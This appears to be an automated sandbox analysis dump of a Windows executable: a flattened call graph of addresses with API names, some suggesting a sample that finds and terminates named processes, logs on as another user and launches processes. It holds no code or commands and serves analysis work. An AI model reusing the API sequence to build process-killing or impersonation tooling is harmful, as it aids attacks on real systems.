7ff7e3ceed9f 10607 7ff7e3ceee37 10606->10607 10630 7ff7e3ceee18 10606->10630 10681 7ff7e3cef949 10606->10681 10608 7ff7e3cef803 6 API calls 10607->10608 10610 7ff7e3ceee44 10608->10610 10617 7ff7e3cef949 6 API calls 10610->10617 10625 7ff7e3ceee5c 10610->10625 10611 7ff7e3cef717 4 API calls 10611->10613 10613->10548 10613->10550 10615 7ff7e3cef717 4 API calls 10623 7ff7e3cef3c7 10615->10623 10616 7ff7e3cef949 6 API calls 10616->10607 10617->10625 10619 7ff7e3ceeaae 10619->10611 10621 7ff7e3cef3de 10624 7ff7e3cef717 4 API calls 10621->10624 10622 7ff7e3ceee0b 10627 7ff7e3cef717 4 API calls 10622->10627 10623->10619 10623->10621 10628 7ff7e3cef717 4 API calls 10623->10628 10624->10619 10626 7ff7e3ceeee9 10625->10626 10700 7ff7e3cefa57 10625->10700 10631 7ff7e3cefa57 6 API calls 10626->10631 10636 7ff7e3ceef05 10626->10636 10627->10630 10628->10621 10630->10607 10630->10616 10631->10636 10632 7ff7e3ceef22 10633 7ff7e3ceefdb 10632->10633 10634 7ff7e3ceef6e 10632->10634 10635 7ff7e3ceefe6 10633->10635 10642 7ff7e3cef2cd 10633->10642 10639 7ff7e3cef763 6 API calls 10634->10639 10655 7ff7e3ceebc1 10634->10655 10637 7ff7e3ceeff7 10635->10637 10640 7ff7e3cefa57 6 API calls 10635->10640 10636->10632 10706 7ff7e3cef763 10636->10706 10643 7ff7e3cef663 6 API calls 10637->10643 10656 7ff7e3cef030 10637->10656 10639->10655 10640->10637 10644 7ff7e3cef321 10642->10644 10647 7ff7e3cef763 6 API calls 10642->10647 10645 7ff7e3cef00e 10643->10645 10649 7ff7e3cefa57 6 API calls 10644->10649 10644->10655 10648 7ff7e3cefa57 6 API calls 10645->10648 10646 7ff7e3cef763 6 API calls 10646->10632 10647->10642 10648->10656 10649->10655 10651 7ff7e3cef717 4 API calls 10651->10656 10652 7ff7e3cef119 10653 7ff7e3cef1b4 10652->10653 10659 7ff7e3cef134 10652->10659 10654 7ff7e3cefa57 6 API calls 10653->10654 10653->10655 10654->10655 10655->10615 10655->10619 10656->10644 10656->10651 10656->10652 10656->10655 10658 7ff7e3cef763 6 API calls 10656->10658 10712 7ff7e3cefb9a 10656->10712 10657 7ff7e3cef763 6 API calls 10657->10659 10658->10656 10659->10655 10659->10657 10719 7ff7e3cef560 10660->10719 10663 7ff7e3cef68b 10725 7ff7e3cef605 10663->10725 10664 7ff7e3cef6ec malloc 10664->10663 10665 7ff7e3cef706 10664->10665 10665->10601 10668 7ff7e3cef724 10667->10668 10669 7ff7e3cef73b 10667->10669 10670 7ff7e3cef560 4 API calls 10668->10670 10669->10598 10670->10669 10672 7ff7e3cee320 6 API calls 10671->10672 10673 7ff7e3cee360 10672->10673 10673->10613 10675 7ff7e3cee32c 10674->10675 10676 7ff7e3cef663 6 API calls 10675->10676 10677 7ff7e3cee340 10676->10677 10677->10606 10677->10619 10677->10655 10678 7ff7e3cef803 10677->10678 10679 7ff7e3cef663 6 API calls 10678->10679 10680 7ff7e3cef814 10679->10680 10680->10606 10682 7ff7e3cef973 10681->10682 10683 7ff7e3cef95d 10681->10683 10684 7ff7e3ceedfd 10682->10684 10686 7ff7e3cef560 4 API calls 10682->10686 10693 7ff7e3cef9d6 10682->10693 10685 7ff7e3cef763 6 API calls 10683->10685 10696 7ff7e3cef829 10684->10696 10685->10682 10687 7ff7e3cef99e 10686->10687 10688 7ff7e3cef9b4 10687->10688 10689 7ff7e3cef803 6 API calls 10687->10689 10688->10684 10691 7ff7e3cef605 LeaveCriticalSection 10688->10691 10689->10688 10690 7ff7e3cef560 4 API calls 10690->10693 10691->10693 10692 7ff7e3cef717 4 API calls 10692->10693 10693->10684 10693->10690 10693->10692 10694 7ff7e3cef829 6 API calls 10693->10694 10695 7ff7e3cef605 LeaveCriticalSection 10693->10695 10694->10693 10695->10693 10697 7ff7e3cef847 10696->10697 10698 7ff7e3cef663 6 API calls 10697->10698 10699 7ff7e3cef866 10698->10699 10699->10622 10699->10699 10701 7ff7e3cefa80 10700->10701 10702 7ff7e3cef663 6 API calls 10701->10702 10704 7ff7e3cefa90 10702->10704 10703 7ff7e3cefb42 10703->10626 10704->10703 10705 7ff7e3cef717 4 API calls 10704->10705 10705->10703 10708 7ff7e3cef77e 10706->10708 10707 7ff7e3ceef43 10707->10632 10707->10646 10708->10707 10709 7ff7e3cef663 6 API calls 10708->10709 10710 7ff7e3cef7b5 10709->10710 10710->10707 10711 7ff7e3cef717 4 API calls 10710->10711 10711->10707 10713 7ff7e3cefbaf 10712->10713 10714 7ff7e3cefbb3 10713->10714 10715 7ff7e3cefbd0 10713->10715 10716 7ff7e3cef663 6 API calls 10714->10716 10717 7ff7e3cef663 6 API calls 10715->10717 10718 7ff7e3cefbba 10716->10718 10717->10718 10718->10656 10720 7ff7e3cef573 EnterCriticalSection 10719->10720 10723 7ff7e3cef591 10719->10723 10720->10723 10721 7ff7e3cef5a4 InitializeCriticalSection InitializeCriticalSection 10721->10723 10722 7ff7e3cef5ec Sleep 10722->10723 10723->10720 10723->10721 10723->10722 10724 7ff7e3cef5fe 10723->10724 10724->10663 10724->10664 10726 7ff7e3cef625 10725->10726 10727 7ff7e3cef60e LeaveCriticalSection 10725->10727 10726->10665 10727->10726 10729 7ff7e3cecc80 localeconv 10728->10729 10730 7ff7e3ceccae 10728->10730 10731 7ff7e3cf026c 6 API calls 10729->10731 10731->10730 11263 7ff7e3cec958 11264 7ff7e3cec960 localeconv 11263->11264 11267 7ff7e3cec382 11263->11267 11265 7ff7e3cf026c 6 API calls 11264->11265 11265->11267 11266 7ff7e3ceca67 11267->11266 11268 7ff7e3ceb3e7 fputc 11267->11268 11268->11267 9898 7ff7e3ceac96 9899 7ff7e3cead13 signal 9898->9899 9901 7ff7e3ceaca1 9898->9901 9900 7ff7e3cead25 signal 9899->9900 9899->9901 9900->9901 9902 7ff7e3ce7096 9903 7ff7e3ce70b2 strlen 9902->9903 9904 7ff7e3ce70c7 9902->9904 9903->9904 10740 7ff7e3cede8a 10743 7ff7e3cedea6 10740->10743 10741 7ff7e3cecc00 10 API calls 10750 7ff7e3cedb86 10741->10750 10742 7ff7e3cedf1c 10742->10741 10743->10742 10744 7ff7e3cedf21 10743->10744 10751 7ff7e3ced5bc 10744->10751 10746 7ff7e3cee2e0 10747 7ff7e3cee301 10746->10747 10748 7ff7e3ceccd9 2 API calls 10746->10748 10748->10747 10749 7ff7e3ceccd9 fputwc fwprintf 10749->10750 10750->10746 10750->10749 10755 7ff7e3ced5d3 10751->10755 10752 7ff7e3ceca90 fputwc 10754 7ff7e3ced7aa 10752->10754 10753 7ff7e3ced76b 10753->10752 10753->10754 10756 7ff7e3ceca90 fputwc 10754->10756 10755->10753 10759 7ff7e3ceca90 fputwc 10755->10759 10757 7ff7e3ced7b7 10756->10757 10758 7ff7e3ceca90 fputwc 10757->10758 10761 7ff7e3ced7c8 10758->10761 10759->10755 10760 7ff7e3ced815 10764 7ff7e3ced861 10760->10764 10767 7ff7e3ceca90 fputwc 10760->10767 10762 7ff7e3ceca90 fputwc 10761->10762 10763 7ff7e3ced7ce 10761->10763 10762->10761 10763->10760 10765 7ff7e3cecc72 7 API calls 10763->10765 10766 7ff7e3ceca90 fputwc 10763->10766 10769 7ff7e3ceccd9 2 API calls 10763->10769 10768 7ff7e3ceca90 fputwc 10764->10768 10765->10763 10766->10763 10767->10760 10770 7ff7e3ced875 10768->10770 10769->10763 9931 7ff7e3cf0088 ___lc_codepage_func ___mb_cur_max_func 9932 7ff7e3cf00b7 9931->9932 9936 7ff7e3cf00f1 9931->9936 9935 7ff7e3cf00bc 9932->9935 9937 7ff7e3cf00c3 9932->9937 9933 7ff7e3ceffd0 2 API calls 9933->9935 9935->9933 9935->9936 9937->9936 9938 7ff7e3ceffd0 9937->9938 9939 7ff7e3cefff4 WideCharToMultiByte 9938->9939 9940 7ff7e3ceffe4 9938->9940 9939->9940 9941 7ff7e3cf0034 _errno 9939->9941 9940->9941 9942 7ff7e3ceffeb 9940->9942 9941->9942 9942->9937 10409 7ff7e3cf0781 BuildTrusteeWithSidW 11328 7ff7e3ce9181 11337 7ff7e3ce8e2e 11328->11337 11329 7ff7e3ce90f2 GetProcessHeap HeapFree 11329->11337 11330 7ff7e3ce8da0 11331 7ff7e3ce9284 11330->11331 11332 7ff7e3ce8da9 FreeLibrary 11330->11332 11332->11331 11333 7ff7e3cea1f1 11 API calls 11333->11337 11334 7ff7e3ce8ecc strlen 11334->11337 11335 7ff7e3ce8f64 GetProcessHeap HeapAlloc 11335->11337 11336 7ff7e3ce8fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 11336->11337 11337->11329 11337->11330 11337->11333 11337->11334 11337->11335 11337->11336 11338 7ff7e3ce795a 14 API calls 11337->11338 11339 7ff7e3ce91dc LocalFree 11337->11339 11340 7ff7e3ce14e2 6 API calls 11337->11340 11338->11337 11339->11337 11340->11337 9965 7ff7e3cec436 9966 7ff7e3cec48e 9965->9966 9967 7ff7e3cec44b 9965->9967 9968 7ff7e3ceb593 strlen 9966->9968 9969 7ff7e3cec475 wcslen 9967->9969 9970 7ff7e3cec46e 9967->9970 9973 7ff7e3cec382 9968->9973 9969->9970 9975 7ff7e3ceb420 9970->9975 9972 7ff7e3ceca67 9973->9972 9974 7ff7e3ceb3e7 fputc 9973->9974 9974->9973 9985 7ff7e3cf0047 9975->9985 9977 7ff7e3ceb44f 9978 7ff7e3ceb3e7 fputc 9977->9978 9983 7ff7e3ceb462 9977->9983 9978->9977 9979 7ff7e3ceb4d1 9980 7ff7e3ceb4ed 9979->9980 9982 7ff7e3ceb3e7 fputc 9979->9982 9980->9973 9981 7ff7e3cf0047 4 API calls 9981->9983 9982->9979 9983->9979 9983->9981 9984 7ff7e3ceb3e7 fputc 9983->9984 9984->9983 9986 7ff7e3cf0053 9985->9986 9987 7ff7e3cf0058 ___mb_cur_max_func ___lc_codepage_func 9985->9987 9986->9987 9988 7ff7e3ceffd0 2 API calls 9987->9988 9989 7ff7e3cf0080 9988->9989 9989->9977 10792 7ff7e3cec631 10794 7ff7e3cec64d 10792->10794 10793 7ff7e3cec6c3 10801 7ff7e3ceb5da 10793->10801 10794->10793 10796 7ff7e3cec6c8 10794->10796 10805 7ff7e3cebdaf 10796->10805 10798 7ff7e3ceca67 10799 7ff7e3cec382 10799->10798 10800 7ff7e3ceb3e7 fputc 10799->10800 10800->10799 10802 7ff7e3ceb5f0 10801->10802 10803 7ff7e3ceb4fe fputc 10802->10803 10804 7ff7e3ceb646 10803->10804 10804->10799 10806 7ff7e3cebdc6 10805->10806 10810 7ff7e3cebf5e 10806->10810 10813 7ff7e3ceb3e7 fputc 10806->10813 10807 7ff7e3cebf9d 10809 7ff7e3ceb3e7 fputc 10807->10809 10808 7ff7e3ceb3e7 fputc 10808->10807 10811 7ff7e3cebfaa 10809->10811 10810->10807 10810->10808 10812 7ff7e3ceb3e7 fputc 10811->10812 10814 7ff7e3cebfbb 10812->10814 10813->10806 10816 7ff7e3ceb3e7 fputc 10814->10816 10817 7ff7e3cebfc1 10814->10817 10815 7ff7e3cec008 10818 7ff7e3cec054 10815->10818 10821 7ff7e3ceb3e7 fputc 10815->10821 10816->10814 10817->10815 10820 7ff7e3ceb3e7 fputc 10817->10820 10823 7ff7e3ceb420 5 API calls 10817->10823 10825 7ff7e3ceb64c 10817->10825 10822 7ff7e3ceb3e7 fputc 10818->10822 10820->10817 10821->10815 10824 7ff7e3cec068 10822->10824 10823->10817 10826 7ff7e3ceb666 10825->10826 10832 7ff7e3ceb68f 10825->10832 10830 7ff7e3cf026c 6 API calls 10826->10830 10827 7ff7e3ceb706 10829 7ff7e3ceb3e7 fputc 10827->10829 10828 7ff7e3ceb6a7 10831 7ff7e3cf0047 4 API calls 10828->10831 10838 7ff7e3ceb6f2 10829->10838 10830->10832 10833 7ff7e3ceb6d5 10831->10833 10832->10827 10832->10828 10834 7ff7e3ceb6f4 10833->10834 10835 7ff7e3ceb6dc 10833->10835 10836 7ff7e3ceb3e7 fputc 10834->10836 10837 7ff7e3ceb3e7 fputc 10835->10837 10835->10838 10836->10838 10837->10835 10838->10817 9990 7ff7e3ce702f 9991 7ff7e3ce7057 wcslen 9990->9991 9992 7ff7e3ce704b 9990->9992 9991->9992 11372 7ff7e3ce212f 11373 7ff7e3ce21b6 11372->11373 11374 7ff7e3ce2159 CreateToolhelp32Snapshot 11372->11374 11377 7ff7e3ce14e2 6 API calls 11373->11377 11375 7ff7e3ce2175 Process32First 11374->11375 11376 7ff7e3ce2227 GetLastError 11374->11376 11379 7ff7e3ce22ff GetLastError 11375->11379 11401 7ff7e3ce21a6 11375->11401 11378 7ff7e3ce14e2 6 API calls 11376->11378 11394 7ff7e3ce21df 11377->11394 11378->11394 11380 7ff7e3ce230c 11379->11380 11381 7ff7e3ce14e2 6 API calls 11380->11381 11381->11401 11382 7ff7e3ce2888 CloseHandle 11384 7ff7e3ce28a3 11382->11384 11382->11394 11383 7ff7e3ce21f4 11386 7ff7e3ce14e2 6 API calls 11383->11386 11392 7ff7e3ce14e2 6 API calls 11384->11392 11387 7ff7e3ce2211 11386->11387 11388 7ff7e3ce24d3 OpenProcess 11390 7ff7e3ce24f4 TerminateProcess 11388->11390 11391 7ff7e3ce25a3 GetLastError 11388->11391 11389 7ff7e3ce24c2 strcmp 11389->11388 11389->11401 11397 7ff7e3ce2484 CloseHandle 11390->11397 11398 7ff7e3ce250a GetLastError 11390->11398 11395 7ff7e3ce14e2 6 API calls 11391->11395 11392->11387 11393 7ff7e3ce26ed Process32Next 11396 7ff7e3ce2704 GetLastError 11393->11396 11393->11401 11394->11383 11394->11384 11395->11401 11396->11401 11397->11401 11399 7ff7e3ce14e2 6 API calls 11398->11399 11399->11401 11400 7ff7e3ce14e2 6 API calls 11400->11401 11401->11382 11401->11388 11401->11389 11401->11393 11401->11397 11401->11400 11402 7ff7e3ce254b 11401->11402 9993 7ff7e3cedc2f 9994 7ff7e3cedc56 9993->9994 9995 7ff7e3cedc62 9993->9995 9997 7ff7e3ceccd9 2 API calls 9994->9997 10001 7ff7e3cedb86 9994->10001 10003 7ff7e3cecacd 9995->10003 9997->10001 9998 7ff7e3cee2e0 9999 7ff7e3cee301 9998->9999 10000 7ff7e3ceccd9 2 API calls 9998->10000 10000->9999 10001->9998 10002 7ff7e3ceccd9 fputwc fwprintf 10001->10002 10002->10001 10004 7ff7e3cecae7 10003->10004 10005 7ff7e3cecafc 10004->10005 10008 7ff7e3cecb4c 10004->10008 10006 7ff7e3cecb27 fwprintf 10005->10006 10010 7ff7e3cecb04 fwprintf 10005->10010 10007 7ff7e3cecb39 10006->10007 10007->9994 10013 7ff7e3ceca90 fputwc 10008->10013 10016 7ff7e3cecb51 10008->10016 10010->10007 10011 7ff7e3cecb8f strlen 10018 7ff7e3cf026c 10011->10018 10012 7ff7e3cecbd9 10012->10007 10015 7ff7e3ceca90 fputwc 10012->10015 10013->10008 10015->10012 10016->10011 10016->10012 10017 7ff7e3ceca90 fputwc 10016->10017 10017->10016 10019 7ff7e3cf0282 ___mb_cur_max_func ___lc_codepage_func 10018->10019 10020 7ff7e3cf027d 10018->10020 10021 7ff7e3cf02bb 10019->10021 10020->10019 10024 7ff7e3cf0150 10021->10024 10025 7ff7e3cf018c 10024->10025 10026 7ff7e3cf0170 10024->10026 10025->10016 10026->10025 10027 7ff7e3cf0254 10026->10027 10029 7ff7e3cf01df IsDBCSLeadByteEx 10026->10029 10032 7ff7e3cf01aa 10026->10032 10027->10025 10028 7ff7e3cf021f MultiByteToWideChar 10027->10028 10028->10025 10030 7ff7e3cf0244 _errno 10028->10030 10029->10027 10029->10032 10030->10025 10031 7ff7e3cf01c6 MultiByteToWideChar 10031->10025 10031->10030 10032->10025 10032->10031 11403 7ff7e3ce292e 11404 7ff7e3ce2944 11403->11404 11405 7ff7e3ce2a53 11404->11405 11406 7ff7e3ce299e 11404->11406 11407 7ff7e3ce14e2 6 API calls 11405->11407 11408 7ff7e3ce2a87 11406->11408 11409 7ff7e3ce29a7 11406->11409 11422 7ff7e3ce29d5 11407->11422 11410 7ff7e3ce14e2 6 API calls 11408->11410 11411 7ff7e3ce2abb 11409->11411 11412 7ff7e3ce29bd strlen 11409->11412 11410->11422 11414 7ff7e3ce14e2 6 API calls 11411->11414 11413 7ff7e3ce2aef strcat 11412->11413 11412->11422 11415 7ff7e3ce2bec 11413->11415 11416 7ff7e3ce2b08 strlen strlen 11413->11416 11414->11422 11420 7ff7e3ce3032 11415->11420 11421 7ff7e3ce2c1a 11415->11421 11415->11422 11417 7ff7e3ce2b38 strlen strcat 11416->11417 11416->11422 11418 7ff7e3ce2b74 11417->11418 11418->11415 11419 7ff7e3ce2b95 strlen strlen 11418->11419 11419->11415 11423 7ff7e3ce2bbc strlen strcat 11419->11423 11420->11422 11424 7ff7e3ce3041 CreateProcessA 11420->11424 11425 7ff7e3ce2c32 LogonUserA 11421->11425 11439 7ff7e3ce2ce5 11421->11439 11426 7ff7e3ce14e2 6 API calls 11422->11426 11436 7ff7e3ce2a3c 11422->11436 11423->11418 11427 7ff7e3ce3191 11424->11427 11428 7ff7e3ce3098 GetLastError 11424->11428 11429 7ff7e3ce2c63 GetLastError 11425->11429 11430 7ff7e3ce2d9d CreateProcessAsUserA 11425->11430 11426->11436 11435 7ff7e3ce14e2 6 API calls 11427->11435 11434 7ff7e3ce14e2 6 API calls 11428->11434 11431 7ff7e3ce14e2 6 API calls 11429->11431 11432 7ff7e3ce2dfc GetLastError 11430->11432 11433 7ff7e3ce2eed 11430->11433 11431->11421 11437 7ff7e3ce14e2 6 API calls 11432->11437 11438 7ff7e3ce14e2 6 API calls 11433->11438 11433->11439 11434->11420 11435->11436 11437->11439 11438->11439 11440 7ff7e3ce2f2d 11439->11440 11441 7ff7e3ce2f27 CloseHandle 11439->11441 11440->11422 11442 7ff7e3ce2f36 11440->11442 11441->11440 11442->11436 11443 7ff7e3ce14e2 6 API calls 11442->11443 11443->11436 10040 7ff7e3ceac27 10043 7ff7e3ceac4e 10040->10043 10041 7ff7e3ceac6f 10042 7ff7e3ceacb5 10042->10041 10045 7ff7e3ceacfb signal 10042->10045 10043->10041 10043->10042 10044 7ff7e3ceacdf signal 10043->10044 10044->10041 10044->10042 10045->10041 10839 7ff7e3cede28 10840 7ff7e3cede3e 10839->10840 10847 7ff7e3ced126 10840->10847 10842 7ff7e3cee2e0 10843 7ff7e3cee301 10842->10843 10844 7ff7e3ceccd9 2 API calls 10842->10844 10844->10843 10845 7ff7e3ceccd9 fputwc fwprintf 10846 7ff7e3cedb86 10845->10846 10846->10842 10846->10845 10848 7ff7e3ced137 10847->10848 10849 7ff7e3ced00f 6 API calls 10848->10849 10850 7ff7e3ced164 10849->10850 10851 7ff7e3ced186 10850->10851 10852 7ff7e3ced179 10850->10852 10854 7ff7e3cecdd0 9 API calls 10851->10854 10853 7ff7e3cecc00 10 API calls 10852->10853 10857 7ff7e3ced184 10853->10857 10855 7ff7e3ced191 10854->10855 10856 7ff7e3ceca90 fputwc 10855->10856 10855->10857 10856->10855 10857->10846 10858 7ff7e3cef626 10859 7ff7e3cef65d 10858->10859 10860 7ff7e3cef63b DeleteCriticalSection 10858->10860 10860->10859 11450 7ff7e3ce5923 11451 7ff7e3ce59d4 11450->11451 11452 7ff7e3ce5936 11450->11452 11453 7ff7e3ce14e2 6 API calls 11451->11453 11454 7ff7e3ce5a04 11452->11454 11455 7ff7e3ce593f CreateFileA 11452->11455 11462 7ff7e3ce59b4 11453->11462 11456 7ff7e3ce14e2 6 API calls 11454->11456 11457 7ff7e3ce5a34 GetLastError 11455->11457 11458 7ff7e3ce597c GetFileSize 11455->11458 11456->11462 11461 7ff7e3ce599b 11457->11461 11459 7ff7e3ce5afa GetLastError 11458->11459 11458->11461 11459->11461 11460 7ff7e3ce59ab CloseHandle 11460->11462 11461->11460 11461->11462 10425 7ff7e3cf0721 DeleteCriticalSection 10429 7ff7e3ceff1f GetModuleHandleW GetProcAddress 10430 7ff7e3ceff73 10429->10430 10431 7ff7e3ceff4c LoadLibraryW GetProcAddress 10429->10431 10431->10430 10867 7ff7e3ce3222 10868 7ff7e3ce3230 WaitForSingleObject 10867->10868 10869 7ff7e3ce325c 10867->10869 10870 7ff7e3ce328c GetLastError 10868->10870 10873 7ff7e3ce3240 10868->10873 10871 7ff7e3ce14e2 6 API calls 10869->10871 10872 7ff7e3ce14e2 6 API calls 10870->10872 10871->10873 10872->10873 10057 7ff7e3ce341c 10058 7ff7e3ce342e GetExitCodeProcess 10057->10058 10059 7ff7e3ce34ad 10057->10059 10061 7ff7e3ce3444 10058->10061 10062 7ff7e3ce350f GetLastError 10058->10062 10060 7ff7e3ce14e2 6 API calls 10059->10060 10065 7ff7e3ce34d6 10060->10065 10063 7ff7e3ce3452 WaitForSingleObject GetExitCodeProcess 10061->10063 10061->10065 10069 7ff7e3ce35f9 TerminateProcess 10061->10069 10064 7ff7e3ce14e2 6 API calls 10062->10064 10066 7ff7e3ce3476 10063->10066 10067 7ff7e3ce36f1 GetLastError 10063->10067 10064->10065 10071 7ff7e3ce37ac 10065->10071 10074 7ff7e3ce14e2 6 API calls 10065->10074 10079 7ff7e3ce33c0 10066->10079 10070 7ff7e3ce14e2 6 API calls 10067->10070 10069->10063 10073 7ff7e3ce360a GetLastError 10069->10073 10070->10065 10076 7ff7e3ce14e2 6 API calls 10073->10076 10078 7ff7e3ce34ab 10074->10078 10075 7ff7e3ce3484 10077 7ff7e3ce14e2 6 API calls 10075->10077 10076->10061 10077->10078 10080 7ff7e3ce33ec 10079->10080 10081 7ff7e3ce33ce CloseHandle CloseHandle 10079->10081 10083 7ff7e3ce14e2 6 API calls 10080->10083 10082 7ff7e3ce33e5 10081->10082 10082->10065 10082->10075 10083->10082 10084 7ff7e3ce181b 10085 7ff7e3ce17b9 10084->10085 10086 7ff7e3ce14e2 6 API calls 10085->10086 10087 7ff7e3ce17d6 10086->10087 11463 7ff7e3cec51b 11464 7ff7e3cec52d 11463->11464 11465 7ff7e3cebbb4 fputc 11464->11465 11467 7ff7e3cec382 11465->11467 11466 7ff7e3ceca67 11467->11466 11468 7ff7e3ceb3e7 fputc 11467->11468 11468->11467 10874 7ff7e3cf0619 MultiByteToWideChar 10444 7ff7e3ce131a 10445 7ff7e3ce1131 152 API calls 10444->10445 10446 7ff7e3ce132e 10445->10446 10875 7ff7e3ce1a19 10876 7ff7e3ce1b02 10875->10876 10877 7ff7e3ce1a32 10875->10877 10880 7ff7e3ce14e2 6 API calls 10876->10880 10878 7ff7e3ce1a3b FindResourceA 10877->10878 10879 7ff7e3ce1b2d 10877->10879 10881 7ff7e3ce1b58 GetLastError 10878->10881 10882 7ff7e3ce1a58 LoadResource 10878->10882 10883 7ff7e3ce14e2 6 API calls 10879->10883 10886 7ff7e3ce1af2 10880->10886 10887 7ff7e3ce14e2 6 API calls 10881->10887 10884 7ff7e3ce1b86 GetLastError GetLastError 10882->10884 10885 7ff7e3ce1a70 10882->10885 10883->10886 10888 7ff7e3ce14e2 6 API calls 10884->10888 10889 7ff7e3ce14e2 6 API calls 10885->10889 10890 7ff7e3ce1b79 10887->10890 10888->10886 10889->10886 10890->10884 10890->10886 10891 7ff7e3cea650 10892 7ff7e3cea659 10891->10892 10893 7ff7e3cea662 10892->10893 10894 7ff7e3ceaebd 3 API calls 10892->10894 10894->10893 11469 7ff7e3ce354e 11470 7ff7e3ce34db 11469->11470 11471 7ff7e3ce37ac 11470->11471 11472 7ff7e3ce14e2 6 API calls 11470->11472 11473 7ff7e3ce3505 11472->11473 10895 7ff7e3ceae48 10896 7ff7e3ceaeb4 10895->10896 10897 7ff7e3ceae5a EnterCriticalSection 10895->10897 10899 7ff7e3ceae73 10897->10899 10898 7ff7e3ceaeab LeaveCriticalSection 10898->10896 10899->10898 10900 7ff7e3ceae98 free 10899->10900 10900->10898 10099 7ff7e3ce5c44 10100 7ff7e3ce5c60 10099->10100 10101 7ff7e3ce5cdf 10099->10101 10103 7ff7e3ce5c79 CreateFileA 10100->10103 10105 7ff7e3ce5d24 10100->10105 10102 7ff7e3ce14e2 6 API calls 10101->10102 10104 7ff7e3ce5d1a 10102->10104 10106 7ff7e3ce5cb2 GetFileTime 10103->10106 10107 7ff7e3ce5ccc GetLastError 10103->10107 10109 7ff7e3ce14e2 6 API calls 10105->10109 10106->10107 10110 7ff7e3ce5d57 10106->10110 10108 7ff7e3ce5cd9 10107->10108 10107->10110 10108->10101 10108->10110 10109->10104 10110->10104 10111 7ff7e3ce5deb CloseHandle 10110->10111 10111->10104 10112 7ff7e3cee045 10116 7ff7e3cedb86 10112->10116 10113 7ff7e3cee2e0 10114 7ff7e3cee301 10113->10114 10115 7ff7e3ceccd9 2 API calls 10113->10115 10115->10114 10116->10113 10117 7ff7e3ceccd9 fputwc fwprintf 10116->10117 10117->10116 10451 7ff7e3cf0739 CreateFileA

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 85 7ff7e3ce8cfc-7ff7e3ce8d3f call 7ff7e3ce9bb9 88 7ff7e3ce8d45-7ff7e3ce8d47 85->88 89 7ff7e3ce927f 85->89 90 7ff7e3ce9284-7ff7e3ce9299 88->90 91 7ff7e3ce8d4d-7ff7e3ce8d59 88->91 89->90 91->90 92 7ff7e3ce8d5f-7ff7e3ce8d71 call 7ff7e3ce1cf4 91->92 95 7ff7e3ce8d73-7ff7e3ce8d7d call 7ff7e3ce1c73 92->95 96 7ff7e3ce8d91-7ff7e3ce8d97 92->96 101 7ff7e3ce8d82-7ff7e3ce8d88 95->101 97 7ff7e3ce8d9c-7ff7e3ce8d9e 96->97 99 7ff7e3ce8da0-7ff7e3ce8da3 97->99 100 7ff7e3ce8db7-7ff7e3ce8dce call 7ff7e3ce1c73 97->100 99->90 102 7ff7e3ce8da9-7ff7e3ce8db2 FreeLibrary 99->102 106 7ff7e3ce8dd4-7ff7e3ce8deb call 7ff7e3ce1c73 100->106 107 7ff7e3ce9257 100->107 101->97 104 7ff7e3ce8d8a-7ff7e3ce8d8f 101->104 102->90 104->99 109 7ff7e3ce9261 106->109 111 7ff7e3ce8df1-7ff7e3ce8e03 call 7ff7e3ce1c73 106->111 107->109 112 7ff7e3ce926b 109->112 111->112 116 7ff7e3ce8e09-7ff7e3ce8e20 call 7ff7e3ce1c73 111->116 115 7ff7e3ce9275 112->115 115->89 116->115 119 7ff7e3ce8e26-7ff7e3ce8e2c 116->119 120 7ff7e3ce8e76-7ff7e3ce8e82 119->120 120->99 121 7ff7e3ce8e88-7ff7e3ce8e8a 120->121 121->99 122 7ff7e3ce8e90-7ff7e3ce8eca call 7ff7e3cea1f1 121->122 125 7ff7e3ce8e72 122->125 126 7ff7e3ce8ecc-7ff7e3ce8f29 strlen 122->126 125->120 128 7ff7e3ce8f2f-7ff7e3ce8f5e 126->128 129 7ff7e3ce8e2e-7ff7e3ce8e49 call 7ff7e3ce14e2 126->129 133 7ff7e3ce8f64-7ff7e3ce8f8d GetProcessHeap HeapAlloc 128->133 134 7ff7e3ce8e4b-7ff7e3ce8e5e call 7ff7e3ce14e2 128->134 129->125 136 7ff7e3ce8f93-7ff7e3ce8fac 133->136 137 7ff7e3ce90a4-7ff7e3ce90c4 call 7ff7e3ce14e2 133->137 141 7ff7e3ce8e63-7ff7e3ce8e6b 134->141 143 7ff7e3ce8fb2-7ff7e3ce9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 136->143 144 7ff7e3ce90c9-7ff7e3ce90df call 7ff7e3ce14e2 136->144 137->141 141->125 146 7ff7e3ce906d-7ff7e3ce9086 call 7ff7e3ce14e2 143->146 147 7ff7e3ce91a9-7ff7e3ce91da call 7ff7e3ce795a 143->147 151 7ff7e3ce90e4-7ff7e3ce90ec 144->151 157 7ff7e3ce910e-7ff7e3ce9114 146->157 158 7ff7e3ce908c 146->158 155 7ff7e3ce91ef-7ff7e3ce9200 call 7ff7e3ce14e2 147->155 156 7ff7e3ce91dc-7ff7e3ce91ea LocalFree 147->156 151->141 154 7ff7e3ce90f2-7ff7e3ce9109 GetProcessHeap HeapFree 151->154 154->141 166 7ff7e3ce9205 155->166 156->151 159 7ff7e3ce9211-7ff7e3ce9216 157->159 160 7ff7e3ce911a-7ff7e3ce9120 157->160 162 7ff7e3ce9092-7ff7e3ce909f 158->162 163 7ff7e3ce919f-7ff7e3ce91a4 158->163 159->151 164 7ff7e3ce9153-7ff7e3ce9159 160->164 165 7ff7e3ce9122-7ff7e3ce9125 160->165 162->137 163->151 167 7ff7e3ce915f-7ff7e3ce9165 164->167 168 7ff7e3ce9239-7ff7e3ce923e 164->168 169 7ff7e3ce9140-7ff7e3ce9146 165->169 170 7ff7e3ce9127-7ff7e3ce912a 165->170 166->156 171 7ff7e3ce9243-7ff7e3ce9248 167->171 172 7ff7e3ce916b-7ff7e3ce9171 167->172 168->151 175 7ff7e3ce922f-7ff7e3ce9234 169->175 176 7ff7e3ce914c-7ff7e3ce9151 169->176 173 7ff7e3ce9130-7ff7e3ce9133 170->173 174 7ff7e3ce921b-7ff7e3ce9220 170->174 171->151 177 7ff7e3ce924d-7ff7e3ce9252 172->177 178 7ff7e3ce9177-7ff7e3ce917c 172->178 179 7ff7e3ce9225-7ff7e3ce922a 173->179 180 7ff7e3ce9139-7ff7e3ce913e 173->180 174->151 175->151 176->151 177->151 178->151 179->151 180->151
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
